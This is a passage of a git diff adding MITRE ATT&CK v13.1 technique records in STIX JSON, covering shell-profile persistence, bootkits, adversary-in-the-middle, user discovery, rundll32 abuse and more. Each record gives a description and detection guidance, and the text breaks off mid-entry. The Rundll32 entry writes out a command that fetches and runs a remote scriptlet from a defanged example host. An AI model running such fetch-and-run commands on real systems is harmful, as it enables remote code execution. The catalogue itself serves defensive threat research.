+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--01df3350-ce05-4bdf-bdf8-0a919a66d4a8.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--01df3350-ce05-4bdf-bdf8-0a919a66d4a8.json new file mode 100644 index 0000000000000000000000000000000000000000..d295e8b00315300d6f4be66bccbb44e41fe8e144 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--01df3350-ce05-4bdf-bdf8-0a919a66d4a8.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--5f26a0ce-cd6b-4f47-8cf9-72b7214d48b2", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Robert Wilson", + "Katie & Tony Lambert", + "Joe Gervais" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--01df3350-ce05-4bdf-bdf8-0a919a66d4a8", + "type": "attack-pattern", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1156", + "url": "https://attack.mitre.org/techniques/T1156" + }, + { + "source_name": "intezer-kaiji-malware", + "url": "https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/", + "description": "Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware turning to Golang. Retrieved December 17, 2020." + } + ], + "modified": "2020-12-22T15:49:33.947Z", + "name": "Malicious Shell Modification", + "description": "Adversaries may establish persistence through executing malicious commands triggered by a user\u2019s shell. User shells execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command line interface or remotely logs in (such as SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user\u2019s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user\u2019s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. \n\nAdversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files (Citation: intezer-kaiji-malware). These files require root permissions and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile (Rocke) which are sourced when a user opens a command line interface or connects remotely. Adversaries often use ~/.bash_profile since the system only executes the first file that exists in the listed order. Adversaries have also leveraged the ~/.bashrc file (Tsunami, Rocke, Linux Rabbit, Magento) which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command line interface. Some malware targets the termination of a program to trigger execution (Cannon), adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session(Pearl_shellbot). \n\nFor macOS, the functionality of this technique is similar but leverages zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin. The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_detection": "While users may customize their shell profile files, there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\n\nMonitor for changes to /ect/profile and /etc/profile.d, these files should only be modified by system administrators. MacOS users can leverage Apple\u2019s Security Endpoint Framework using the ES_EVENT_TYPE_NOTIFY_WRITE(Citation: ESF_filemonitoring) function for monitoring these specific files. \n", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688.json new file mode 100644 index 0000000000000000000000000000000000000000..401ce6bad65322cd900291f164ead530405fb3aa --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--beca2ecb-60a5-4691-9b40-b84c18895482", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:39.967Z", + "name": "Screen Capture", + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_detection": "Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", + "created": "2017-05-31T21:31:25.060Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1113", + "external_id": "T1113" + }, + { + "source_name": "CopyFromScreen .NET", + "description": "Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved March 24, 2020.", + "url": "https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8" + }, + { + "source_name": "Antiquated Mac Malware", + "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--02fefddc-fb1b-423f-a76b-7552dd211d4d.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--02fefddc-fb1b-423f-a76b-7552dd211d4d.json new file mode 100644 index 0000000000000000000000000000000000000000..61b704181bc85262350c6eb61f924b62a692ee63 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--02fefddc-fb1b-423f-a76b-7552dd211d4d.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--b5b11e21-4c2b-49d5-9b1e-dcf18ec73555", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--02fefddc-fb1b-423f-a76b-7552dd211d4d", + "type": "attack-pattern", + "created": "2017-05-31T21:30:54.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1067", + "url": "https://attack.mitre.org/techniques/T1067" + }, + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf", + "description": "Mandiant. (2016, February). M-Trends 2016. Retrieved January 4, 2017.", + "source_name": "MTrends 2016" + }, + { + "url": "http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion", + "description": "Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? (Infographic). Retrieved November 13, 2014.", + "source_name": "Lau 2011" + } + ], + "modified": "2020-03-20T19:53:25.628Z", + "name": "Bootkit", + "description": "A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016)\n\nAdversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\n### Master Boot Record\nThe MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)\n\n### Volume Boot Record\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_detection": "Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334.json new file mode 100644 index 0000000000000000000000000000000000000000..980b52b5f915d1b16977ca59d06392e4b293489c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--3a2cdfdb-6067-4be4-86dd-1294c7b16256", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:38.295Z", + "name": "Boot or Logon Initialization Scripts", + "description": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. \n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. \n\nAn adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Windows", + "Linux" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [ + "File: File Creation", + "Active Directory: Active Directory Object Modification", + "Windows Registry: Windows Registry Key Creation", + "File: File Modification", + "Process: Process Creation", + "Command: Command Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", + "created": "2017-05-31T21:30:38.910Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1037", + "external_id": "T1037" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d.json new file mode 100644 index 0000000000000000000000000000000000000000..918fe2ecde335a8ec28320f9ae8af8e48d484fd8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d.json @@ -0,0 +1,104 @@ +{ + "type": "bundle", + "id": "bundle--81d34ebb-d5ee-48a2-ae11-59716c673405", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:37.568Z", + "name": "Adversary-in-the-Middle", + "description": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\n\nFor example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.(Citation: volexity_0day_sophos_FW) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)\n\nAdversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Mayuresh Dani, Qualys", + "Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project", + "NEC" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor network traffic for anomalies associated with known AiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux", + "Network" + ], + "x_mitre_version": "2.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content", + "Service: Service Creation", + "Windows Registry: Windows Registry Key Modification", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", + "created": "2020-02-11T19:07:12.114Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1557", + "external_id": "T1557" + }, + { + "source_name": "dns_changer_trojans", + "description": "Abendan, O. (2012, June 14). How DNS Changer Trojans Direct Users to Threats. Retrieved October 28, 2021.", + "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/125/how-dns-changer-trojans-direct-users-to-threats" + }, + { + "source_name": "volexity_0day_sophos_FW", + "description": "Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.", + "url": "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/" + }, + { + "source_name": "taxonomy_downgrade_att_tls", + "description": "Alashwali, E. S., Rasmussen, K. (2019, January 26). What's in a Downgrade? A Taxonomy of Downgrade Attacks in the TLS Protocol and Application Protocols Using TLS. Retrieved December 7, 2021.", + "url": "https://arxiv.org/abs/1809.05681" + }, + { + "source_name": "ad_blocker_with_miner", + "description": "Kuzmenko, A.. (2021, March 10). Ad blocker with miner included. Retrieved October 28, 2021.", + "url": "https://securelist.com/ad-blocker-with-miner-included/101105/" + }, + { + "source_name": "mitm_tls_downgrade_att", + "description": "praetorian Editorial Team. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved December 8, 2021.", + "url": "https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/" + }, + { + "source_name": "Rapid7 MiTM Basics", + "description": "Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March 2, 2020.", + "url": "https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/" + }, + { + "source_name": "tlseminar_downgrade_att", + "description": "Team Cinnamon. (2017, February 3). Downgrade Attacks. Retrieved December 9, 2021.", + "url": "https://tlseminar.github.io/downgrade-attacks/" + }, + { + "source_name": "ttint_rat", + "description": "Tu, L. Ma, Y. Ye, G. (2020, October 1). Ttint: An IoT Remote Access Trojan spread through 2 0-day vulnerabilities. Retrieved October 28, 2021.", + "url": "https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104.json new file mode 100644 index 0000000000000000000000000000000000000000..c8b17a66b6b0248e478c1f929d1735dcd2bd32cc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104.json @@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--463ee45a-ef4c-439a-9a50-07465757e525", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-12T23:35:40.261Z", + "name": "System Owner/User Discovery", + "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information.\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_contributors": [ + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "`System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nFor network infrastructure devices, collect AAA logging to monitor `show` commands being run by non-standard users from non-standard locations.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [ + "Process: OS API Execution", + "Process: Process Access", + "Windows Registry: Windows Registry Key Access", + "Active Directory: Active Directory Object Access", + "Network Traffic: Network Traffic Content", + "File: File Access", + "Process: Process Creation", + "Command: Command Execution", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "created": "2017-05-31T21:30:35.733Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1033", + "external_id": "T1033" + }, + { + "source_name": "show_ssh_users_cmd_cisco", + "description": "Cisco. (2023, March 7). Cisco IOS Security Command Reference: Commands S to Z . Retrieved July 13, 2022.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s5.html" + }, + { + "source_name": "US-CERT TA18-106A Network Infrastructure Devices 2018", + "description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-106A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2.json new file mode 100644 index 0000000000000000000000000000000000000000..3556acc7d245f42b5498eced40e29d291c347b57 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2.json @@ -0,0 +1,80 @@ +{ + "type": "bundle", + "id": "bundle--a9415a33-da16-4694-ba0f-7d23a2414d08", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-02T21:34:46.139Z", + "name": "Acquire Infrastructure", + "description": "Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.\n\nUse of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090).(Citation: amnesty_nso_pegasus) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_detection": "Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. \n\nOnce adversaries have provisioned infrastructure (ex: a server for use in command and control), internet scans may help proactively discover adversary acquired infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_contributors": [ + "Shailesh Tiwary (Indian Army)" + ], + "x_mitre_data_sources": [ + "Internet Scan: Response Metadata", + "Domain Name: Active DNS", + "Internet Scan: Response Content", + "Domain Name: Domain Registration", + "Domain Name: Passive DNS" + ], + "type": "attack-pattern", + "id": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "created": "2020-09-30T16:37:40.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1583", + "external_id": "T1583" + }, + { + "source_name": "amnesty_nso_pegasus", + "description": "Amnesty International Security Lab. (2021, July 18). Forensic Methodology Report: How to catch NSO Group\u2019s Pegasus. Retrieved February 22, 2022.", + "url": "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/" + }, + { + "source_name": "Koczwara Beacon Hunting Sep 2021", + "description": "Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.", + "url": "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2" + }, + { + "source_name": "TrendmicroHideoutsLease", + "description": "Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017.", + "url": "https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf" + }, + { + "source_name": "Mandiant SCANdalous Jul 2020", + "description": "Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.", + "url": "https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation" + }, + { + "source_name": "ThreatConnect Infrastructure Dec 2020", + "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", + "url": "https://threatconnect.com/blog/infrastructure-research-hunting/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5.json new file mode 100644 index 0000000000000000000000000000000000000000..dee688f78fe638db6163cae966de834385540ec2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5.json @@ -0,0 +1,87 @@ +{ + "type": "bundle", + "id": "bundle--8805934e-d602-45b0-85ae-b60b3c44b08d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-21T12:25:32.096Z", + "name": "Rundll32", + "description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).\n\nAdditionally, adversaries may use 